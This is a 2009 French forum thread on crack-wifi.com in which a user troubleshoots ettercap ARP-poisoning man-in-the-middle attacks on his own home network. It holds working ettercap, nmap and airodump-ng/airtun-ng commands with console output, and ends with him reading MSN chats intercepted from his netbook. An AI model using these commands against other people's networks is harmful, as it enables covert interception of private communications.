Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 27-02-2009 00:30:06

Jean
Membre
Inscription : 26-02-2009
Messages : 21

Ettercap - Pc invisible

Bonsoir,

Je me permets d'ouvrir ce topic pour poser unepetite question concernant ettercap

J'ai 3 pc à la maison, un poste de bureau, un portable et un netbook.

Ettercap est installé sur mon portable.

Avec Etteracap-ng, l'attaque MITM par arp poisonning fonctionne tres bien lorsque je m'attaque à mon routeur ( target 1) et à mon desktop ( target 2 ) .

Le plugin chk poison me le confirme. J'active le plugin remote browser, je vois bien les urls qui s'affichent dans ettercap, qd je lance firefox sur le desktop.

Après l'attaque MITM, j'ai également essayé l'outil msnshadow qui fonctionne très bien.

Bref, les début sont encourageants.

Mon souci, c'est que cela ne fonctionne qu'avec mon desktop.

Mon netbook est pourtant bien connecté à internet, a msn, etc.

J'ai attribué à mon netbook une ip fixe (comme pour mon desktop d 'ailleurs), mais je ne le vois pas dans ettercap-ng hmm

Il n'apparait pas dans la liste d' hosts puisqu'il n'est même pas détecté par le host scan .

Je suis donc perplexe.

J'ai multiplié les recherches sur le net mais n'ai vraiment pas trouvé grand chose à me mettre sous la dent.

Quelqu'un pourrait-il m'expliquer pourquoi mon netbook n'est pas détecté du tout dans ettercap ?

Ps: Mon netbook n'est pas détecté non plus dans Wireshark ( je ne vois que des paquets qui concerne l'ip de mon desktop ).

Merci à vous.;)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 27-02-2009 02:54:32

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Ettercap - Pc invisible

hello Jean,

Si tu lances ettercap depuis ton netbook, il est normal que tu vois pas ton netbook dans ce cas là.
Par contre dans wireshark tu devrais voir des paquets de ton netbook...à condition qu'il y en ait à se mettre sous la dent bien sur. Tu as bien choisi la bonne interface de capture réseau dans wireshark? celle que tu utilise effectivement sur ton netbook? Tu as fait une requète quelconque au moins depuis ton netbook pour que il y ait quelques paquets pendant la capture de wireshark?


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#3 27-02-2009 12:13:34

Jean
Membre
Inscription : 26-02-2009
Messages : 21

Re : Ettercap - Pc invisible

Bonjour Grand Hibou,

Merci pour ta réponse.

Non, je me suis manifestement mal exprimé roll

Je lance toujours Ettercap sur mon laptop, pas sur mon netbook.

Ce que je voulais dire, c'est que je ne parviens qu'à empoisonner mon pc  de bureau mais pas mon netbook.

Mon netbook n'apparait pas dans ettercap, il n'est pas trouvé dans le scan host  ( ettercap est toujours lancé sur mon laptop. )

Et oui, sur mon netbook je génère de l'activité, je consulte des pages web, me connecte à msn, etc...

Mais toujours rien, ettercap se borne a ne me trouver que 2 hosts ( le routeur et le desktop ).

Pour ce qui est de Wireshark, je ne comprends pas non plus, pas de trace de 192.168.30.19 ( qui est l'ip de mon netbook ) ..

J'espère avoir été un  peu plus clair,

Merci pour vos conseils   wink

Hors Ligne

#4 27-02-2009 12:58:18

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Ettercap - Pc invisible

Ta box doit agir comme un switch. Essaies d'utiliser Netdiscover en mode actif pour découvrir les machines présentes sur ton réseau, et ton netbook devrait apparaitre dans le scan.

Une fois son adresse IP récupérée, tu pourras lancer ton attaque Man In The Middle avec ettercap-ng:

ettercap -T -M arp:remote /ip-victime/ /ip-routeur/

Tiens nous au courant wink

Hors Ligne

#5 27-02-2009 17:48:15

Jean
Membre
Inscription : 26-02-2009
Messages : 21

Re : Ettercap - Pc invisible

Bonjour M1ck3y,

Je profite de ton intervention pour te remercier des tutos que tu as généreusement mis à disposition de tous.

Les tutos sont clairs, détaillés et surtout accessibles pour les utilisateurs débutants.

Un grand merci donc !

Pour en revenir à la discussion, même en suivant tes conseils, cela ne fonctionne pas.

Je me suis documenté sur Netdiscover, mais d'après ce que j'en ai compris, cet utilitaire va me permettre, entre autre, de récupérer l'ip locale de ma victime (ici, mon netbook sous windows Xp).

Quoiqu'il en soit, je connais déjà cette adresse ip puisque je l'ai configuré manuellement >> 192.168.30.19

Je vais donc tenter de décrire précisement les manipulations que j'ai faites pour essayé de comprendre quel est le problème.

Je précise que, n'ayant toujours pas installé BT 4 en dur, je travaille pour le moment sur ma Ubuntu 8.10 ( je fais bien entendu toutes les manip' en root ).

1°)etter.conf

J'ai modifié les lignes suivantes de mon fichier etter.conf pour utiliser correctement le plugin remote_browser

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

Et

# the command used by the remote_browser plugin
remote_browser = "firefox -remote= openurl http://%host%url"

2°) J'attribue une ip fixe à ma carte wifi


ifconfig wlan0 192.168.30.15 netmask 255.255.255.0 broadcast 192.168.30.255

Puis

route add default gateway 192.168.30.1 dev wlan0

3)° Ettercap en mode graphique

ettercap -G

Sniff >> Unified sniffing  >> wlan0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

>> Hosts >>  Scan for hosts

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
1 host added to the hosts list.

>> Host >> Hosts List >> Il n'y a donc que mon routeur  >> 192.168.30.1

En passant par l'interface graphique cela ne fonctionne donc pas hmm

3°) Bis - Ettercap en mode texte   (suivant les recommandations de M1ck3y)

ettercap -T -M arp:remote /192.168.30.19/ /192.168.30.1/

Résultas :

Listening on eth0... (Ethernet)

  eth0 ->	00:13:XX:XX:XX:XX           invalid           invalid

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

0 hosts added to the hosts list...

FATAL: MITM attacks can't be used on unconfigured interfaces

Après quelques recherches, j'ai compris qu'il me fallait préciser le "nom" de mon interface wifi avec le paramètre -i

Ce qui me donne alors :

ettercap -T -M arp:remote /192.168.30.19/ /192.168.30.1/ -i wlan0

Et en retour de console :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on wlan0... (Ethernet)

 wlan0 ->	00:16:XX:XX:XX:XX     192.168.30.15     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:


 GROUP 2 : 192.168.30.1 00:60:XX:XX:XX:XX
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Manifestement cela ne fonctionne pas mieux !

J'ai bien compris qu'il me fallait mofifier le fichier etter.conf pour les connections ssl, chose que je n'ai pas faite pour le moment car cela me semble compliqué ( je prendrai le temps de me documenter à ce sujet ) mais ce n'est évidemment pas cela qui pose problème dans l'immdédiat.

Désolé pour le caractère très scolaire de mon post, mais en essayant de bien structurer les choses, cela me permet de mieux comprnedre ce que je fais.

Merci pour votre aide. smile

Edit: Ton lien sur Netdiscover est très intéressant. J'ai bien compris que son intérêt résidait principalement dans la possibilité de l'utiliser en mode passif et être ainsi indétectable.

Toutefois, le scan ne me donne pas de résultats concluant et il semblerait que Netdiscover fasse planter ma box ( j'ai essayé de lancer le scan en mode actif 2 fois et les 2 fois ma box a planté) hmm

Dernière modification par Jean (27-02-2009 17:59:59)

Hors Ligne

#6 27-02-2009 18:21:44

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Ettercap - Pc invisible

Bizarre bizarre tout ça...

Ton netbook a bien le meme masque de sous réseau et le meme type d'adressage ip que les autres machines du réseau? Il tourne sous quel OS? Il répond aux ICMP echo requests (pings)? Il n'y a pas d'entrées statiques dans le cache ARP du netbook? Si l'adresse mac du routeur est en entrée statique l'attaque par ARP poisoning ne fonctionnera pas. Tu peux essayer de vider le cache ARP du netbook pour voir si ça change quelque chose.

Au fait, de rien pour les tutos, d'ailleurs ça me fait plaisir de voir que tu t'y intéresse. Lorsque tu auras avancé dans ton exploration d'ettercap-ng n'hésites pas à nous donner quelques infos ou astuces utiles si tu découvres des choses intéressantes smile

Hors Ligne

#7 27-02-2009 18:37:05

Jean
Membre
Inscription : 26-02-2009
Messages : 21

Re : Ettercap - Pc invisible

Merci pour ces nouvelles pistes.

Alors, mon netbook tourne sous windows Xp.

Le masque de sous reseau et l'adressage ip me semble cohérents, oui :

Ip locale : 192.168.30.19
Masque : 255.255.255.0
Passerelle par défaut : 192.168.30.1
Serveur dns préféré : 192.168.30.1

En revanche, je viens de m'apercevoir qu'il ne répondait pas aux pings !  C'est très curieux !
Il faut donc creuser de ce côté là.

Sinon, je ne sais pas s'il y a des entrées statiques dans le cache Arp de mon netbook.
Je vais chercher comment le vérifier et comment vider mon cache arp.

Sur mon routeur par contre, cela ne doit pas être le cas, puisque l'Arp poisonning fonctionne sans problème lorsque je m'attaque à mon pc de bureau !

Ta réponse m'aura donc permi d'avancer un petit peu, je ne peux pas pinger le netbook, il faut sans aucun doute que je commence par comprendre pourquoi.

Merci.

Edit : En tout cas, tu ne sembles pas avoir noté d'erreur dans les manipulations que j'ai décrit dans mon post précédent ! C'est bon signe, je trouve cela très encourageant !  wink

Dernière modification par Jean (27-02-2009 18:39:29)

Hors Ligne

#8 27-02-2009 19:59:00

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Ettercap - Pc invisible

Et depuis ton netbook, tu arrives à pinger la passerelle? Logiquement tu devrais pas non plus vu les symptômes.

Essaie de faire la même manoeuvre en te brachant en ethernet avec le netbook pour voir .

Lance wireshark  sur ton netbook quand tu fais les manoeuvre, pour essayer de voir ce qui se "trame" justement au niveau réseau depuis ton netbook.


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#9 01-03-2009 15:43:31

Jean
Membre
Inscription : 26-02-2009
Messages : 21

Re : Ettercap - Pc invisible

Bonjour à tous,

Voici les dernières nouvelles.

Mon netbook ( sous xp, connecté en wifi ) répond bien aux pings, et peut lui même pinger la passerelle.
Il se connecte correctement à Internet.

J'ai vidé le cache Arp sur celui-ci .

Malheureusement, le netbook n'aparaît toujours pas dans ettercap lorsque je lance le scan hosts mad

Je ne peux donc même pas tenter un arp poisonning !

J'ai passé plusieurs heures à chercher sur le net des solutions à mon problème mais je n'ai pas trouvé de cas similaire.

Le problème n'est donc pas que l'attaque MITM ne fonctionne pas, mais bien que mon netbook n'est pas détécté dans ettercap .

Je ne sais plus de quel côté chercher.

Si l'un d'entre vous avait une idée, je suis preneur wink

Dernière modification par Jean (01-03-2009 15:44:19)

Hors Ligne

#10 01-03-2009 16:26:31

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Ettercap - Pc invisible

Pour identifier les machines présentes sur un réseau, le "scan hosts" d'ettercap n'est pas non plus ce qu'il se fait de mieux. En matière de scan, as tu essayé de voir si ton netbook était détecté avec d'autres scanners, comme par exemple nmap ou Nessus?

Perso je n'utilise pas l'interface graphique d'ettercap, je le lance en ligne de commande et j'utilise d'autres programmes pour identifier les machines présentes sur le réseau.

Hors Ligne

#11 01-03-2009 18:17:53

Jean
Membre
Inscription : 26-02-2009
Messages : 21

Re : Ettercap - Pc invisible

Bonjour M1ck3y,

Merci pour cette dernière intervention qui m'a permi de bien avancer big_smile:D: big_smile:D:D

A vrai dire, je suis débutant sous Linux, et je ne m'étais jamais servi des utilitaires Nmap et Nessus.

J'ai donc lu la documentation Nmap et fais quelques test.

Voici les commandes que j'ai utilisé :

nmap -sS 192.168.30.19

Qui me donne (grosso modo) 1 ip found - 0 host up

Ensuite,

nmap -O 192.168.30.19

Qui me dis la même chose mais me suggère d'utiliser les paramètres -PN.

Chose que je me suis donc empressé de faire !

Résultats : 1 ip found - 1 host up lol

Du coup, j'ai retenté la commande que tu m'avais donné mais cela n'a pas fonctionné.

Mais par contre cela a fonctionné nickel en changeant l'ordre Ip netbook - Ip routeur :

ettercap -T -M arp:remote /192.168.30.1/ /192.168.30.19/ -i wlan0

Bingo ! L'arp poisoning a manifestement fonctionné, puisque je vois dans ma console, mes differentes conversations msn !!

Cool !

Bon, ce qui me dérange un peu, c'est que je n'ai pas vraiment compris pourquoi en utilisant les paramètres -PN avec nmap et en mettant d'abord l'ip du routeur dans ettercap cela a fonctionné ???

Et que ca marche enfin est une très bonne nouvelle, mais comprendre pourquoi est quand même plus intéressant !

Pour finir, juste une petite question si vous me le permettez wink

J'ai ré essayé ettercap en mode graphique mais le netbook est toujours invisible.
Ce n'est pas très grave, j'utiliseari la ligne de commande.

Mais comment utiliser les plugins en ligne de commande ?

Les lignes défilent à toute vitesse et je ne peux rien y écrire !

J'aimerai notamment utiliser le plugin remote_browser ( et chk_poison juste par principe, puisque ca marche ).

Je te remercie vraiment d'avoir suivi mon post M1ck3y car je me doute bien que mon problème de débutant n'avait rien de passionnant pour l'expert que tu es.

Merci aussi à toi Grand Hibou pour avoir tenté de me donner quelques pistes ;


Edit : Maintenant, je peux voir le traffic généré par mon netbook dans wireshark !!
Quand on fini par réussir quelque chose après y avoir passé tout un week end, ca fait vraiment plaisir big_smile

Dernière modification par Jean (01-03-2009 18:22:20)

Hors Ligne

#12 01-03-2009 19:50:02

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Ettercap - Pc invisible

Oulah, mais je ne suis pas un expert, loin de là... Je suis simplement l'admin big_smile

Voici un petit tuto vidéo sur ettercap en 6 parties:

Ettercap - Part 1 of 6

Ettercap - Part 2 of 6

Ettercap - Part 3 of 6

Ettercap - Part 4 of 6

Ettercap - Part 5 of 6

Ettercap - Part 6 of 6

J'éspère que la bande de petits h4x0rs aura des trucs intéressants à t'apprendre, sinon savais tu qu'il existe un forum dédié à Ettercap? Ca se trouve ici: ettercap.sourceforge.net Forum.

Je pense qu'entre les petites vidéos, le forum officiel Ettercap et une petite recherche tu devrais assez rapidement continuer à développer ton intéret pour Ettercap et venir nous apprendre de nouvelles choses très intéressantes smile

Hors Ligne

#13 01-03-2009 20:09:25

Grand Hibou
Membre d'honneur
Inscription : 08-06-2008
Messages : 1 280

Re : Ettercap - Pc invisible

Pour le paramètre -PN de nmap ( avant c'était -P0 à la place), cela demande en fait à nmap de changer son scan par défaut qui consiste à d'abord  faire un ping sur l'adresse ou la plage d'addresse ip ciblérs.
Si une adrese ne répond pas au ping, nmap ne poursuivra pas le boulot et considérera qu'il n'y a pas de gabonnais au numéro demandé! big_smile
Un certain nombre de machines (serveurs web biensur aussi) ont tout simplement désactivé la réponse aux pings(alors que le RFC stipule bien que c'est une focntion obligatoire cela dit!). Avec -PN on dit à nmap de poursuivre le boulot même si il n'y a pas de réponse au ping préalable.  Une machine ne répondant pas au ping de nmap peut donc très bien être là et bien là avec des milliards de ports ouverts!


Un virus est un programme nocif.
Il est petit, rapide, prend peu de place en mémoire et sait se faire discret.

Windows n'est donc pas un virus, c'est un bug!

Hors Ligne

#14 22-03-2009 10:54:46

whois
Membre Actif
Inscription : 12-01-2009
Messages : 25

Re : Ettercap - Pc invisible

j'ai un petit souci de capture avec ettercap :

je veux donc capturer des pages http ainsi que les conversations msn , voici comment je procède :
Il me faut donc capturer un fichier .cap de la personne puis une rogue donc ma commande est la suivant

airodump-ng --write essai --channel 10 --bssid 00:00:00:00:00:00: wlan0
modprobe tun
airtun-ng -a 00:00:00:00:00:00: -w 123456 wlan0
ifconfig at0 up

ensuite j'ouvre ettercap puis sniff puis unified sniffing et je choisi at0 ; ensuite dans hosts je fais un scan mais la il ne me trouve pas de hosts list
Ou j'ai merdé ?

Dernière modification par whois (22-03-2009 10:55:57)

Hors Ligne

#15 24-03-2009 17:36:43

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : Ettercap - Pc invisible

Voila un sujet qui mérite un autre topic...

Au lieu de passer par airtun-ng qui n'est qu'une interface virtuelle servant à décrypter les données, pour utiliser Ettercap il faut que tu sois connecté au réseau.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
20 240 10-11-2016 12:54:26 par koala
2 532 27-10-2015 00:21:23 par zoz25
1 910 15-03-2014 08:57:27 par Furyo
MITM Ettercap HTTPS ? par Endless-Hacking
2 1201 12-08-2013 13:24:07 par Volkow
8 1298 30-07-2013 21:25:24 par Speedfan

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]